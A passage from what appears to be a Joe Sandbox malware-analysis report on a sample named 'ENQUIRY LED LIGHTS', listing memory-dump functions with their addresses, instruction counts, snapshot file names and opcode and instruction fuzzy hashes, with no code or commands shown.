                                                                                                  • Instruction Fuzzy Hash: 1ED0C972654660ABD772AA1CFC04FD373E9AB887A1F160499B119CB150C7A5AC81CA84
                                                                                                  Function 02F8E908 Relevance: .0, Instructions: 16COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                  • Instruction ID: 2a7ddb1b9eae074d68552b6dc2775450eb1e8870d4b150dbd7627981b6f80e3b
                                                                                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                  • Instruction Fuzzy Hash: 50E08C31D406809BCF12EF58CA40F4AB7F6BB84B80F140048A1085B220C324A800CB40
                                                                                                  Function 02F0A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                  • Instruction ID: 8ec86906e86354347532c742db589f7acaa90e5473fac9d9138f6b527b4fa5e8
                                                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                  • Instruction Fuzzy Hash: DFD02233316030A3CB285A606C40F6379069B85BE4F0A006C370A93840C1088C82EAE0
                                                                                                  Function 02F4CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d10d895350946ba4ed179d843c3cb684a70490192ea51cd785cf79858b519fc6
                                                                                                  • Instruction ID: f6d325044ccd1ee8d51cc68323ad62853ee83b10283a65b3583f9d7a91fb2806
                                                                                                  • Opcode Fuzzy Hash: d10d895350946ba4ed179d843c3cb684a70490192ea51cd785cf79858b519fc6
                                                                                                  • Instruction Fuzzy Hash: 95D0A735A42005CBCF16EF04CA20E2E7AB1EF046C4F8010A9E70051030D729DC01CA00
                                                                                                  Function 02F4A830 Relevance: .0, Instructions: 14COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                  • Instruction ID: affbe9ee85cdbb4e348d5b0de882b17e9009454f514df9bff8329e718294b033
                                                                                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                  • Instruction Fuzzy Hash: 73D012771D055CBBCB119F65DC01F957BA9E755BA0F445020B6048B5A0C63AE990DA84
                                                                                                  Function 02F202A0 Relevance: .0, Instructions: 13COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                  • Instruction ID: e51975fc6af1be568a1944cc8b01571c962a1a2b70ef5400b04e8020920be9a5
                                                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                  • Instruction Fuzzy Hash: B2D0C936712E80CFC71BCB0CC5A4B2533B4FB45B84F8104A5E501CBB61DB2CD944CA00
                                                                                                  Function 02F4C700 Relevance: .0, Instructions: 12COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                  • Instruction ID: 3ffc92e1308c6a0de418931cad00de473e5120114362846f6fb6fc1edbbc6807
                                                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                  • Instruction Fuzzy Hash: 8DC01232290648AFC712AE98DD01F027BAAEB98B90F000061F3048B670C635E860EA84
                                                                                                  Function 02F30310 Relevance: .0, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                  • Instruction ID: b41c376a0e73ca4f1e3fa67e717566b1226375441635ff5a9db5f908ea288c3b
                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                  • Instruction Fuzzy Hash: 84D01236100248EFCB02DF45C890D9A772BFBC8750F108019FD19076108A31ED62DA50
                                                                                                  Function 02F10750 Relevance: .0, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                  • Instruction ID: c268f5bf43fb1cfb8b5397d7a80b517722dc251778d8bbd9207a0b7181792c28
                                                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                  • Instruction Fuzzy Hash: B7C04C797015458FCF15DB19D794F5577E5F744780F5508D0E905CB721E724E805CA10
                                                                                                  Function 02F54340 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a03e51cefe7872d3f5eb921f2fb6ca83339a97116bedd0dc2444cc379da76610
                                                                                                  • Instruction ID: 7739b79ab38cc4fc1e3a5dd05478f5afb9520ec1f122ac167a8eee646d66b84f
                                                                                                  • Opcode Fuzzy Hash: a03e51cefe7872d3f5eb921f2fb6ca83339a97116bedd0dc2444cc379da76610
                                                                                                  • Instruction Fuzzy Hash: E8900271605800229140715888885574015D7E0381B55C015E5424554C8A158A5A5361
                                                                                                  Function 02F54650 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4ac95618343af3cceb3770c204df7f2430c73b371630ed1e3ee2a22fd5b321ce
                                                                                                  • Instruction ID: c91c41489c6dbeb143353ce2c2b3e1379c89142a7dc2914d49c0b4b81333011b
                                                                                                  • Opcode Fuzzy Hash: 4ac95618343af3cceb3770c204df7f2430c73b371630ed1e3ee2a22fd5b321ce
                                                                                                  • Instruction Fuzzy Hash: FA9002A1601500524140715888084176015D7E1381395C119A5554560C861989599269
                                                                                                  Function 02F52AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 40b4e426c641de10d74f2e7f8143e822a7fe089a7f20ae107f2def0b5e308659
                                                                                                  • Instruction ID: 7de685362459f36af8abea0f67d18edfab4ff4c5ecd1a55534bd0166b45c483c
                                                                                                  • Opcode Fuzzy Hash: 40b4e426c641de10d74f2e7f8143e822a7fe089a7f20ae107f2def0b5e308659
                                                                                                  • Instruction Fuzzy Hash: E5900265221400120145B558460851B0455D7D63D1395C019F6416590CC62289695321
                                                                                                  Function 02F52AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 29147128e383488fc9352995b98b5d4f5548dd0fd36450c37cba28258385d707
                                                                                                  • Instruction ID: 98c28dbe82a6beec0a87781e7aec6e4828bbd8e0555aceba1882b078099c8ce5
                                                                                                  • Opcode Fuzzy Hash: 29147128e383488fc9352995b98b5d4f5548dd0fd36450c37cba28258385d707
                                                                                                  • Instruction Fuzzy Hash: B4900475311400130105F55C470C5170057C7D53D1355C035F7015550CD733CD755131
                                                                                                  Function 02F52AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2e91113542b96de8011ccf43e4d5e6d98c5211bcaf8a1534d2dccab2fa19a1d3
                                                                                                  • Instruction ID: 90dfd5095069289e55918d8494e32b8d9ecd24e4ed8c08668c61a7d1b80a028a
                                                                                                  • Opcode Fuzzy Hash: 2e91113542b96de8011ccf43e4d5e6d98c5211bcaf8a1534d2dccab2fa19a1d3
                                                                                                  • Instruction Fuzzy Hash: 879002E1201540A24500B258C408B1B4515C7E0281B55C01AE6054560CC52689559135
                                                                                                  Function 02F52BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a29736b8b0e161cd86e0e06c55e466c5394126f1d3ddf9d5f6beeba9392775f
                                                                                                  • Instruction ID: eb98cce755a9c25b058a6c3e0a00fb4ab0df1642940227a619dde7bc8ed5580f
                                                                                                  • Opcode Fuzzy Hash: 5a29736b8b0e161cd86e0e06c55e466c5394126f1d3ddf9d5f6beeba9392775f
                                                                                                  • Instruction Fuzzy Hash: B590027120140812D1807158840865B0015C7D1381F95C019A5025654DCA168B5D77A1
                                                                                                  Function 02F52BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d3dd5c4f9fbe7faa96f440213c75d1afffc946f9b8126f22009bcf4dad6cb44a
                                                                                                  • Instruction ID: 89a3c2d78a0a6ceb4ac2057b31f4e7ea35b98db82cd3bb27d6ad33adfb2b772f
                                                                                                  • Opcode Fuzzy Hash: d3dd5c4f9fbe7faa96f440213c75d1afffc946f9b8126f22009bcf4dad6cb44a
                                                                                                  • Instruction Fuzzy Hash: 8F90027120544852D14071588408A570025C7D0385F55C015A5064694D96268E59B661
                                                                                                  Function 02F52BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 321ab38c005c3c84fba2d1eb6ffd7e1f8d4475ea7033ff6588c1fcbb0033917b
                                                                                                  • Instruction ID: 4fa97e9be4aefabeafca2329e5a85b750fdea643ae824063e2ec48dab5c1ae37
                                                                                                  • Opcode Fuzzy Hash: 321ab38c005c3c84fba2d1eb6ffd7e1f8d4475ea7033ff6588c1fcbb0033917b
                                                                                                  • Instruction Fuzzy Hash: DB90027160540812D150715884187570015C7D0381F55C015A5024654D87568B5976A1
                                                                                                  Function 02F52B80 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 89b474627aacbd5eb9e0f60d71bfca1bcab5b99f8add269c719d197c930f0975
                                                                                                  • Instruction ID: 20df5f81fcae39590cb20fe8e2fb7d427bd0f0e40031111f76340a9c2c1da8c5
                                                                                                  • Opcode Fuzzy Hash: 89b474627aacbd5eb9e0f60d71bfca1bcab5b99f8add269c719d197c930f0975
                                                                                                  • Instruction Fuzzy Hash: 3E90027120140812D104715888086970015C7D0381F55C015AB024655E966689957131
                                                                                                  Function 02F52EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 58379faf74a51e468f35f462814214f6b2e91b526020fe83cf85c29b13639329
                                                                                                  • Instruction ID: 32400a6bbb5abb7cba4e54b87e49f1f87c53197ffd700f3cc1584bd865ec5323
                                                                                                  • Opcode Fuzzy Hash: 58379faf74a51e468f35f462814214f6b2e91b526020fe83cf85c29b13639329
                                                                                                  • Instruction Fuzzy Hash: A29002A120180413D140755888086170015C7D0382F55C015A7064555E8A2A8D556135
                                                                                                  Function 02F52EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a82c4543cde1b277530b4aad5f5ea51dd08ea8f8f8d4a944aa4f6fffb0c92a3f
                                                                                                  • Instruction ID: df8f85a59c75b4be621a1dbb6801a87a6a442a2f3c5dde123dea73f754b4b361
                                                                                                  • Opcode Fuzzy Hash: a82c4543cde1b277530b4aad5f5ea51dd08ea8f8f8d4a944aa4f6fffb0c92a3f
                                                                                                  • Instruction Fuzzy Hash: 019002B120140412D140715884087570015C7D0381F55C015AA064554E865A8ED96665
                                                                                                  Function 02F52E80 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 00fc0c8714c28f41c69c8afc5a7a613656caee28af8ae0f0c6b623448059de90
                                                                                                  • Instruction ID: d2314a58ad9cac7509259bd10e5f0c7ba189605dae8435e54b82dc29f46f30cf
                                                                                                  • Opcode Fuzzy Hash: 00fc0c8714c28f41c69c8afc5a7a613656caee28af8ae0f0c6b623448059de90
                                                                                                  • Instruction Fuzzy Hash: 1890026160140512D10171588408627001AC7D02C1F95C026A6024555ECA268A96A131
                                                                                                  Function 02F52E30 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dcf0ee76627e846f182056b143a096fab0e2af9836450baa71a954c5a133be76
                                                                                                  • Instruction ID: 58820a2510eed30de118ad55fb011b598392b59177dcf9632bfd7052265610b7
                                                                                                  • Opcode Fuzzy Hash: dcf0ee76627e846f182056b143a096fab0e2af9836450baa71a954c5a133be76
                                                                                                  • Instruction Fuzzy Hash: 2A90026130140412D102715884186170019C7D13C5F95C016E6424555D86268A57A132
                                                                                                  Function 02F52FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a84e06a6b95ce20b48ae13393e05308d9dbe2ad1c8d1868d5bf5035ed47674d
                                                                                                  • Instruction ID: 7871af7120aed2198d8362311d5d7750803c14f2102dfe6d68af1b15941a14c4
                                                                                                  • Opcode Fuzzy Hash: 5a84e06a6b95ce20b48ae13393e05308d9dbe2ad1c8d1868d5bf5035ed47674d
                                                                                                  • Instruction Fuzzy Hash: 1F900261211C0052D20075688C18B170015C7D0383F55C119A5154554CC91689655521
                                                                                                  Function 02F52FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae7a3bf17b049e7669c2ad5acc63d1e06f8f952a515e713b8efca1c063f5f2cd
                                                                                                  • Instruction ID: 1c4062bd518a3475ddb63f8d394ff504e74e2cac73053e4b5ba2c160aa1b9cf6
                                                                                                  • Opcode Fuzzy Hash: ae7a3bf17b049e7669c2ad5acc63d1e06f8f952a515e713b8efca1c063f5f2cd
                                                                                                  • Instruction Fuzzy Hash: E49002616014005241407168C8489174015EBE1291755C125A5998550D855A89695665
                                                                                                  Function 02F52FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4dfc752107c8675ec81f04184e262167105a211c219d084a077964150daa6201
                                                                                                  • Instruction ID: c9b9dc6f1b88b35bc4b7d78308c97fcc005be4a797c08ba8aff9e122e3711ccb
                                                                                                  • Opcode Fuzzy Hash: 4dfc752107c8675ec81f04184e262167105a211c219d084a077964150daa6201
                                                                                                  • Instruction Fuzzy Hash: 4490027120180412D1007158880C7570015C7D0382F55C015AA164555E8666C9956531
                                                                                                  Function 02F52F90 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cee6feff8984d67e6956b796c64de3d7eaf48faeb657f8254dbc23292c5b25dd
                                                                                                  • Instruction ID: 5c78ae1d1771057da53ed6a9c4d2b981efbbefcdf808a1f59b75c24df466d54b
                                                                                                  • Opcode Fuzzy Hash: cee6feff8984d67e6956b796c64de3d7eaf48faeb657f8254dbc23292c5b25dd
                                                                                                  • Instruction Fuzzy Hash: E690027120180412D1007158881871B0015C7D0382F55C015A6164555D862689556571
                                                                                                  Function 02F52F60 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9dfaaa86c8156e74bfd75237fffd370d68e25c515704dd41ee51b396f1164c45
                                                                                                  • Instruction ID: 47a34aeb60da250f761926dd3aec1173b1edfe79400d331e8b783e6e20feb88e
                                                                                                  • Opcode Fuzzy Hash: 9dfaaa86c8156e74bfd75237fffd370d68e25c515704dd41ee51b396f1164c45
                                                                                                  • Instruction Fuzzy Hash: 659002A121140052D104715884087170055C7E1281F55C016A7154554CC52A8D655125
                                                                                                  Function 02F52F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4d683354123d4d9525d22a9b37852d021bd0b0271c07b772e0eb06fd36213716
                                                                                                  • Instruction ID: 17f2daef2404eb9418128504c42eaab271fc60962944ea59d058feb4d1875410
                                                                                                  • Opcode Fuzzy Hash: 4d683354123d4d9525d22a9b37852d021bd0b0271c07b772e0eb06fd36213716
                                                                                                  • Instruction Fuzzy Hash: EB9002A134140452D10071588418B170015C7E1381F55C019E6064554D861ACD566126
                                                                                                  Function 02F52CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5bf26fdc6637fa840bfa3cdb3f37123c6a8039f8d9db4ff9f82de1258c963eb3
                                                                                                  • Instruction ID: 6639a5bced26394a9a51e2775a46f6ac30492baf6c4b5d03e8f56177fc0a3127
                                                                                                  • Opcode Fuzzy Hash: 5bf26fdc6637fa840bfa3cdb3f37123c6a8039f8d9db4ff9f82de1258c963eb3
                                                                                                  • Instruction Fuzzy Hash: F390047130140413D100715CD50C7170015C7D03C1F55D415F543455CDD757CD557131
                                                                                                  Function 02F52CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 44d1b1d32aee27cdd77398f2dda8bd9b3971894bbb3caff370f089a7d9d3c0a4
                                                                                                  • Instruction ID: b5fd6b78436adc3c58f0935cd2c1e014920921bc0faf3517fbb8b74c9d79d9b5
                                                                                                  • Opcode Fuzzy Hash: 44d1b1d32aee27cdd77398f2dda8bd9b3971894bbb3caff370f089a7d9d3c0a4
